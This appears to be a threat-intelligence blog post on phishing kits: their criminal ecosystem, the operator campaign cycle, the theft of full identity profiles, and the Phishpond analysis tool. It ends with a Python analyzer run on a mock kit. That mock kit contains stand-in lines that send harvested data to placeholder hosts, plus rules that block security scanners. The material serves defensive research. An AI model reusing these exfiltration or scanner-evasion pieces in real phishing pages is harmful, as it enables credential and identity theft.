
What is a Phishing Kit? Analysis and Tools for Threat Researchers


Phishing kits are a new clique in the cybercrime economy hallways. These products have entire communities of developers and buyers that operate like SaaS companies. In this post, we will highlight just a few of the takeaways from ZeroFox Senior Director of Threat Intelligence, Zack Allen’s 2021 RSA Conference presentation “My Phishing Kit Burnbook.” In this fascinating session, Zack reviews a year’s worth of phishing kit research, outlining organized crime groups behind these kits and presenting a new tool called Phishpond, an open-source phishing kit detection and analysis tool.

What is a Phishing Kit?

Phishing attacks are more than just a website for account takeover. There are many types of phishing attacks, and the term is often overloaded. Attacks like spear phishing, vishing, malware and BEC scams are sometimes described as phishing, and each one has different end goals. In this post, however, we focus on phishing as practiced by cybercriminals who run spam campaigns with the end goal of fraud: stealing personally identifiable information (PII) and financial information through a web server deployed on the internet. Defenders, analysts and threat researchers will be familiar with a URL like the one below.

Sample URL Indicating Phishing Activity

You might ask yourself, “Why is there protonmail/index.php at the end?” This is your first hint that you are most likely dealing with a phishing page. The more astute researchers will notice that several nested directories lead to that phishing page. Navigating up the path will, in some cases, bring you to an open directory listing such as the one below. Here we see a ProtonMail directory link that leads to the phishing site, with a zip file available alongside it. Congratulations, you found a phishing kit!

Sample Directory Illustrating Phishing Activity

After downloading the zip file, you can run 7zip to list the contents of the archive and the kit may look something like the example below.

Sample Phishing Kit Zip File

What you see here is a collection of PHP files, HTML, assets like JavaScript, CSS and PNG images, and text files. This is a phishing kit!

A phishing kit is preconstructed code that allows fraudsters to quickly deploy phishing sites. Kits are sold and traded online across the dark web, deep web, social media sites and forums. They come with varying levels of features, much like a SaaS product: lower-priced or stolen kits are not that advanced, while higher-tiered kits are more expensive and very modular. These more robust kits also include APIs, multiple ways to exfiltrate stolen data, and in some cases digital rights management and licensing. Kits are popular because they offer a high return on investment for threat actors: an actor can quickly stand up a phishing site without understanding the back-end controls or having an advanced skill set. All that’s left is to upload the kit to a server, deploy it, and begin reaping the benefits of the phishing attack.

ZeroFox has been doing phishing research for quite some time. Our threat researchers have noticed that, regardless of the threat actor or group behind the activity, participants tend to fall into a few buckets: operator, developer, infrastructure broker and the illicit market.

Phishing Kit Ecosystem and Personas

You could be dealing with any combination of these types of personas, but the basic premise is that they all have the same goal in mind in the phishing game: to make money.

Operator 

The operator purchases the kit from the developer, obtains the means to spam with it, and then sells the data the kit steals.

Developer 

The developer builds the kit, hosts it, takes feature requests, and keeps improving it, so more operators purchase it. 

Infrastructure Broker 

Infrastructure brokers obtain servers, accounts and email inboxes used to send spam. They acquire these illicitly, through tactics such as carding or other fraud.

Illicit Market 

Markets are where stolen data is bought and sold. Developers, operators and brokers use markets as a hub to buy and sell inventory.

All these roles tied together are the ingredients for an “ecosystem of fraud” recipe when it comes to phishing kits.

What it Takes to Make a Phishing Campaign 

Operators perform spam campaigns in a flywheel-like fashion. The more they complete this flywheel, the faster and more efficient they get:

Phishing Kit Operator Campaign Phases

First, the operator identifies a place they can go to buy or sell financial information or PII. Once they know where they can sell stolen data, they purchase a phishing kit along with data to help them spam, such as lists of email addresses or phone numbers. Sometimes they also purchase a “letter,” a prepackaged piece of HTML designed to get past email spam filters.

Once those purchases are complete, the operator deploys the kit. They get a virtual private server (VPS), install a web server and a LAMP stack with PHP, and copy the purchased zip file onto the attack server. After extracting it, they build a payload, either from the letter template or through a comparable SMS spamming service, to send out the phishing link.

The campaign is launched from here, and it’s as easy as clicking a button that sends a wave of outreach (emails, text messages or more) directing victims to the phishing website. The kit excels at blocking automated security scanners; meanwhile, the victim starts filling in the data the actors are after. The operator collects that data in several ways, which Zack details in his demo during his RSA presentation. Operators store the collected information and later retrieve and list it for sale in the market they identified in the first “identifies” step, closing the flywheel.

Understanding Victim Workflow 

When you’re researching phishing kit activity, it’s essential to consider what the ZeroFox Threat Research team refers to as the “victim workflow.” This defines the user experience during the phishing attack. Compare the two Cash App screenshots below and see if you can spot which one is authentic. 

Phishing Page Comparison

Without access to the domain or the source code, it can be difficult to tell the difference if you’re not an expert analyst, and most victims are not. This is because phishing kit developers go to great lengths, spending hours to ensure the fraudulent site looks exactly like the brand they are targeting. Each page is purpose-built so threat actors can capture the right information for that brand.

Initially, you can see that only the email and password are collected. What’s interesting is that the phishing pages that follow gather much more, including the victim’s name, address, Social Security number, debit card, credit card and more. This goes beyond most conceptions of what phishing attacks collect and builds something far more detailed and damaging.

Sample Phases to Build Stolen Data Package Profile

This complete stolen data package is what threat actors call a profile, or “Pro.” With this detailed package in hand, they can sell a whole set of data rather than just usernames and passwords.

Security practitioners and researchers must keep in mind that phishing attacks are not limited to collecting usernames and passwords. These profiles are prepackaged identity-compromise toolsets, and all of this information stored together is very useful to anyone attempting to compromise a victim’s financial livelihood.

This isn’t to say this example is representative of all phishing pages or that attacks are limited to this purview, but this does show that there is a broad spectrum when it comes to phishing kits and attacks. It is essential to understand this in threat research to stay abreast of the latest threat trends and adapt security measures appropriately.

There is also a wide range of variables to consider when assessing a threat model pertaining to the organization or industry itself as well as the brands and what they offer threat actors as a target. Phishing attacks can be more complicated than most might initially think and warrant more discussion, collaboration and research within the cybersecurity community. 

Research and Defense with Phishpond

Phishpond is an open-source phishing kit detection and analysis tool

Phishpond is a resource the ZeroFox Threat Research team developed to help analyze phishing kits. The tool aims to help defenders and researchers analyze the tactics, techniques and procedures (TTPs) employed by phishing operators and developers. It is readily available and can be used to quickly find exfiltration endpoints, identify weaknesses in phishing kits, uncover additional intelligence, fingerprint known kits, and find new ones. Take a deeper dive in the pond by watching Zack’s presentation, where he demos the tool on several kits, and then try it for yourself! You can also download ZeroFox’s white paper “The Anatomy of a Phishing Kit: Detect and Remove Emerging Phishing Threats” to learn more about phishing kits and how this evolving threat can be tackled at scale.
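The kinds of checks an analyst runs over a downloaded kit archive, from the inventory of PHP, HTML and asset files described above through to the exfiltration endpoints, scanner-blocking logic and harvested fields that Phishpond surfaces, can be illustrated with a small script. The following is an added example written for this post, not Phishpond’s code or any ZeroFox tooling. The kit archive it inspects is constructed in memory from a few placeholder files (reserved `.invalid` domains and documentation IP ranges), and the regular expressions, keyword lists and the `analyze_kit` report layout are this example’s own assumptions, not a description of how Phishpond works.

```python
import hashlib
import io
import re
import zipfile
from collections import Counter

# Constructed stand-in for a kit archive (not a real kit): a few files that
# mimic the layout the post describes. Endpoints use reserved example domains.
SAMPLE_KIT_FILES = {
    "protonmail/index.php": (
        "<?php include 'send.php'; ?>\n"
        "<form method='post'><input name='email'><input name='password'>\n"
        "<input name='ssn'><input name='card_number'></form>\n"
    ),
    "protonmail/send.php": (
        "<?php\n"
        "$to = 'drop@example.invalid';\n"
        "mail($to, 'Result', $msg);\n"
        "$ch = curl_init('https://api.example.invalid/collect');\n"
    ),
    "protonmail/.htaccess": "Order Allow,Deny\nAllow from all\nDeny from 192.0.2.0/24\n",
    "protonmail/blocker.php": "<?php $bad = ['googlebot', 'phishtank']; ?>\n",
    "protonmail/css/style.css": "body{}\n",
    "protonmail/js/app.js": "console.log('x');\n",
    "protonmail/img/logo.png": "\x89PNG",
    "protonmail/readme.txt": "kit readme\n",
}

# Assumed heuristics for this example: which files are worth reading as text,
# what an exfiltration endpoint looks like, and which form fields are sensitive.
TEXT_EXTS = {"php", "html", "htm", "js", "txt", "htaccess"}
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
SCANNER_RE = re.compile(r"bot|crawl|phishtank|safebrowsing", re.I)
FIELD_RE = re.compile(r"name=['\"]([\w-]+)['\"]")
SENSITIVE = ("pass", "ssn", "social", "card", "cvv", "pin", "dob", "account")


def build_sample_kit() -> bytes:
    """Zip the constructed files in memory so the example runs offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in SAMPLE_KIT_FILES.items():
            zf.writestr(name, content)
    return buf.getvalue()


def _ext(name: str) -> str:
    base = name.rsplit("/", 1)[-1]
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""


def analyze_kit(zip_bytes: bytes) -> dict:
    """Inventory a kit archive and pull out the indicators a defender wants:
    exfiltration endpoints, anti-scanner blocking, and the fields harvested."""
    report = {"file_types": Counter(), "emails": set(), "urls": set(),
              "anti_scanner": {}, "sensitive_fields": set()}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = sorted(n for n in zf.namelist() if not n.endswith("/"))
        for name in names:
            ext = _ext(name)
            report["file_types"][ext] += 1
            if ext not in TEXT_EXTS:
                continue
            text = zf.read(name).decode("utf-8", "replace")
            report["emails"].update(EMAIL_RE.findall(text))
            report["urls"].update(URL_RE.findall(text))
            if ext in ("php", "html", "htm"):
                report["sensitive_fields"].update(
                    f for f in FIELD_RE.findall(text)
                    if any(k in f.lower() for k in SENSITIVE))
            if ext == "htaccess":
                # Deny rules are the classic way kits keep scanners out.
                deny = [ln.strip() for ln in text.splitlines()
                        if ln.lower().startswith("deny from")]
                if deny:
                    report["anti_scanner"][name] = deny
            else:
                hits = sorted({m.lower() for m in SCANNER_RE.findall(text)})
                if hits:
                    report["anti_scanner"][name] = hits
    # Structural fingerprint: the same file list suggests the same kit family.
    report["fingerprint"] = hashlib.sha256("\n".join(names).encode()).hexdigest()
    return report


if __name__ == "__main__":
    for key, value in analyze_kit(build_sample_kit()).items():
        print(f"{key}: {value}")
```

Running the script prints the file-type inventory (three PHP files, one each of .htaccess, CSS, JS, PNG and text), the drop email address and collection URL found in `send.php`, the deny rule and scanner keywords that would block automated crawlers, the sensitive fields the form collects, and a SHA-256 over the sorted file list that can be compared across samples to group kits by family. A real kit should only ever be opened this way, from the archive, on an isolated analysis host; nothing here executes the PHP.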
